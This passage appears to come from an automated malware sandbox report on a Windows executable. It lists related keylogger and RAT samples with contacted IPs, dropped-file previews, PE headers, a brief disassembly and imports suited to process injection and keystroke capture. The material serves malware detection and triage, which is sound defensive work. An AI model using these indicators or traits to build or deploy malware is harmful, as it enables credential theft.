                                                                                                                AHSlIDftf1.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                eLo1khn7DQ.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                CLOUDFLARENETUSy1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.80.1
                                                                                                                AuKUol8SPU.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 104.21.48.233
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.64.1
                                                                                                                EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 172.67.137.47
                                                                                                                ht58337iNC.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                • 172.67.152.246
                                                                                                                wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 188.114.97.3
                                                                                                                https://probashkontho.com/work/Organization/privacy/index_.htmlGet hashmaliciousUnknownBrowse
                                                                                                                • 104.17.25.14
                                                                                                                psibx9rXra.exeGet hashmaliciousFormBookBrowse
                                                                                                                • 23.227.38.74
                                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.96.1
                                                                                                                invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                                                                                • 172.64.41.3
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                54328bd36c14bd82ddaa0c04b25ed9ady1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.32.1
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.32.1
                                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.32.1
                                                                                                                CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.32.1
                                                                                                                FPACcnxAUT.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.32.1
                                                                                                                jxy62Zm6c4.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 104.21.32.1
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                YJwE2gTm02.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 104.21.32.1
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0ey1jQC8Y6bP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                FILHKLtCw0.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                m0CZ8H4jfl.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 149.154.167.220
                                                                                                                s2Jg1MAahY.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                • 149.154.167.220
                                                                                                                fGu8xWoMrg.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                MqzEQCpFAY.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 149.154.167.220
                                                                                                                6mllsKaB2q.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                • 149.154.167.220
                                                                                                                No context
                                                                                                                Process:C:\Users\user\Desktop\9L83v5j083.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):207872
                                                                                                                Entropy (8bit):7.831686979573526
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:nz5idv7bz19QdxdDSiTNECCaBsQSilymdn8KfRVAL59OUO1a5AYgpE3QMKsMY6:zcv9cd/SCCaBsNGysVSnhOg5n6Y6
                                                                                                                MD5:48A9B8A9A259F8F29D04B0C9422C45E2
                                                                                                                SHA1:9B7A496DDA772106F192F8ED639728B4D225F48C
                                                                                                                SHA-256:A1F4A6E6DCD1780F7178CD53166B49705323DAD704547C64730CE1501FD06666
                                                                                                                SHA-512:28B63C6C4D77476C8F184DC5E0B8D140A71F2E503A107BD7EF687AA27B121BF68DB1C2038DA27E214495802AA11DA45BF856D8B5F73DFA816BD8CE8368D41DDC
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:...3SKLUHRC6..3P.DJ61N9Z.73PKLULRC6873P4DJ61N9ZC73PKLULRC687.P4DD).@9.J...J..m.+_K.C"[#8W\nZ;-Y\$k.0l 6X.^]pp...\!]?m:>ZoLULRC68_#..h;.ObH.=.B.5~v3,|G.I8.:aG.0.+.Io!.2go<=*I.Mb.-4.@.Gh`LM}:.+.; ^.F..4DJ61N9ZC73PKLUL..^73P4..61.8^CC.P.LULRC687.P.EA78N9.B73.JLULRC..73P$DJ6.O9ZCw3P[LULPC6=73P4DJ64N9ZC73PK<VLRG68..R4FJ6.N9JC7#PKLU\RC&873P4DZ61N9ZC73PKL.YPCf873PTFJR:O9ZC73PKLULRC6873P4DJ61N9Z..2PWLULRC6873P4DJ61N9ZC73PKLULR.;:7sP4DJ61N9ZC73.JL.MRC6873P4DJ61N9ZC73PKLULRC6.CV(@DJ6).8ZC'3PK.TLRG6873P4DJ61N9ZC.3P+b'(37W87.=4DJ.0N94C73.JLULRC6873P4DJv1Nyt'VG1KLU.bC68.1P4RJ61D;ZC73PKLULRC68w3P.j8EC-9ZCS8QKL5NRC:973p6DJ61N9ZC73PKL.LR.6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC6873P4DJ61N9ZC73PKLULRC
                                                                                                                Process:C:\Users\user\Desktop\9L83v5j083.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):203294
                                                                                                                Entropy (8bit):7.9780738436588186
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:8J5LhWSHK8bCiKUr6X/xjT+BJHpgjT5MMl6ZoU:8J5FLHpbjKkqjTgJHUV6Z9
                                                                                                                MD5:CFD47F3F2D53642F81E19DC5CB7C3C2F
                                                                                                                SHA1:7C4BFAEE90E89D4B48B2586E7F5907F0827C3245
                                                                                                                SHA-256:825C88FFE1BEB7D939C4616810CA8412C30D52FD2DB1BD710F9A569D89292CE4
                                                                                                                SHA-512:CC482C523BD0C7E2396959F37EDCDA6874510BE2D698879473D2171206A82B1A9B72BD6A86C0D425B87E82A4C889939A8360654C2CDF9C8A20C7ADD397C5905E
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:EA06..,...t.:...U.T.sn?"gP.Q)Si.:sZ...u..r...N.....h`.....IN..9.R.Q/E*.....u.\^."....z.;..k.K\.al.M....v.p..b...v.m.O.V..\..}H.w.....n.....9e...<.Y...Eez.M.C..Y........R....,..m.u...r..R...P.x.6...p.!.i..q^........".Z..qN..Sy..../F~.........K..[..*.9....3@..O*...m8.B*SJ5*m..NiT9....T.r`..V."...(v`.v.F.T.T../..g.<4.W.p..s...../..*....}.j.ZQ@..%=..j.'..:.@.....y.BWb..&sz..o.....i.:s4.E9......1.^n.z..b..c,@..^cP.T..J$..?..6>.....-.\*s....5.T.s...gp..P..ZeJ.........{;.^...R.;..aC.|.T.~.W.M..z.F...0..[....0....=..}?|.,....m1.z....R.5ZeW.f.`y..^#.....|Nob..}.@....T'.).&}...p. ..,.....2!;.^.8|t.9f.s9sZ...C....:..kK...i...7O.@..&..$..3..P.i.m'..4.u.R..l..1...l;].F.6.^<.-..=g..,zn,F.F.Mv..V.(B..k.3.G.Z......7.M. ..bk...z..:....@........a;..ro3.ca...Nu3..?....OJ..&....er....=.....;.E.]..Gi49..K.u.U9.{p.@M&4.E.....7.{.~UZ.h$..E.l.BR...p.y...(}.v.y..m........0..h+Q....2..#._U.....q>V.UL.p.....74..y7.=..W.ay6.e^...#...Z.a..<..~....!t?.".C.N........
                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Entropy (8bit):7.127453582722202
                                                                                                                TrID:
                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                File name:9L83v5j083.exe
                                                                                                                File size:905'878 bytes
                                                                                                                MD5:fa59fc9d6c2af739eaa63d3af4d6f428
                                                                                                                SHA1:0550a7caae5cbe592ada14d028601c95cc9c678b
                                                                                                                SHA256:909a74c7a03956c55492863028a975ccf0917f54fab5d4fa8cfa2bfa8e480ed9
                                                                                                                SHA512:fd728cf6a59b4db4c1223992c0ed25206da787b8fc0b8622ac875896d2f1f7a24d8596b6e3f825f021f423f60b29cd110ab61f111127df4a95af3a705d8daa57
                                                                                                                SSDEEP:24576:uRmJkcoQricOIQxiZY1iaC3zdlP1RtygCmm/:7JZoQrbTFZY1iaCjdagK
                                                                                                                TLSH:5D15C022F5D68036C2B323B19E7EF76A963D79360326D29723C82D315EA05416B39773
                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                Icon Hash:1733312925935517
                                                                                                                Entrypoint:0x4165c1
                                                                                                                Entrypoint Section:.text
                                                                                                                Digitally signed:false
                                                                                                                Imagebase:0x400000
                                                                                                                Subsystem:windows gui
                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                TLS Callbacks:
                                                                                                                CLR (.Net) Version:
                                                                                                                OS Version Major:5
                                                                                                                OS Version Minor:0
                                                                                                                File Version Major:5
                                                                                                                File Version Minor:0
                                                                                                                Subsystem Version Major:5
                                                                                                                Subsystem Version Minor:0
                                                                                                                Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                Instruction
                                                                                                                call 00007F9AA46228FBh
                                                                                                                jmp 00007F9AA461976Eh
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                int3
                                                                                                                push ebp
                                                                                                                mov ebp, esp
                                                                                                                push edi
                                                                                                                push esi
                                                                                                                mov esi, dword ptr [ebp+0Ch]
                                                                                                                mov ecx, dword ptr [ebp+10h]
                                                                                                                mov edi, dword ptr [ebp+08h]
                                                                                                                mov eax, ecx
                                                                                                                mov edx, ecx
                                                                                                                add eax, esi
                                                                                                                cmp edi, esi
                                                                                                                jbe 00007F9AA46198EAh
                                                                                                                cmp edi, eax
                                                                                                                jc 00007F9AA4619A86h
                                                                                                                cmp ecx, 00000080h
                                                                                                                jc 00007F9AA46198FEh
                                                                                                                cmp dword ptr [004A9724h], 00000000h
                                                                                                                je 00007F9AA46198F5h
                                                                                                                push edi
                                                                                                                push esi
                                                                                                                and edi, 0Fh
                                                                                                                and esi, 0Fh
                                                                                                                cmp edi, esi
                                                                                                                pop esi
                                                                                                                pop edi
                                                                                                                jne 00007F9AA46198E7h
                                                                                                                jmp 00007F9AA4619CC2h
                                                                                                                test edi, 00000003h
                                                                                                                jne 00007F9AA46198F6h
                                                                                                                shr ecx, 02h
                                                                                                                and edx, 03h
                                                                                                                cmp ecx, 08h
                                                                                                                jc 00007F9AA461990Bh
                                                                                                                rep movsd
                                                                                                                jmp dword ptr [00416740h+edx*4]
                                                                                                                mov eax, edi
                                                                                                                mov edx, 00000003h
                                                                                                                sub ecx, 04h
                                                                                                                jc 00007F9AA46198EEh
                                                                                                                and eax, 03h
                                                                                                                add ecx, eax
                                                                                                                jmp dword ptr [00416654h+eax*4]
                                                                                                                jmp dword ptr [00416750h+ecx*4]
                                                                                                                nop
                                                                                                                jmp dword ptr [004166D4h+ecx*4]
                                                                                                                nop
                                                                                                                inc cx
                                                                                                                add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                inc cx
                                                                                                                add byte ptr [ebx], ah
                                                                                                                ror dword ptr [edx-75F877FAh], 1
                                                                                                                inc esi
                                                                                                                add dword ptr [eax+468A0147h], ecx
                                                                                                                add al, cl
                                                                                                                jmp 00007F9AA6A920E7h
                                                                                                                add esi, 03h
                                                                                                                add edi, 03h
                                                                                                                cmp ecx, 08h
                                                                                                                jc 00007F9AA46198AEh
                                                                                                                rep movsd
                                                                                                                jmp dword ptr [00000000h+edx*4]
                                                                                                                Programming Language:
                                                                                                                • [ C ] VS2010 SP1 build 40219
                                                                                                                • [C++] VS2010 SP1 build 40219
                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                • [ASM] VS2010 SP1 build 40219
                                                                                                                • [RES] VS2010 SP1 build 40219
                                                                                                                • [LNK] VS2010 SP1 build 40219
                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
                                                                                                                RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
                                                                                                                RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
                                                                                                                RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
                                                                                                                RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
                                                                                                                RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581
                                                                                                                DLLImport
                                                                                                                WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                                                                                                                KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                EnglishGreat Britain
                                                                                                                EnglishUnited States
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
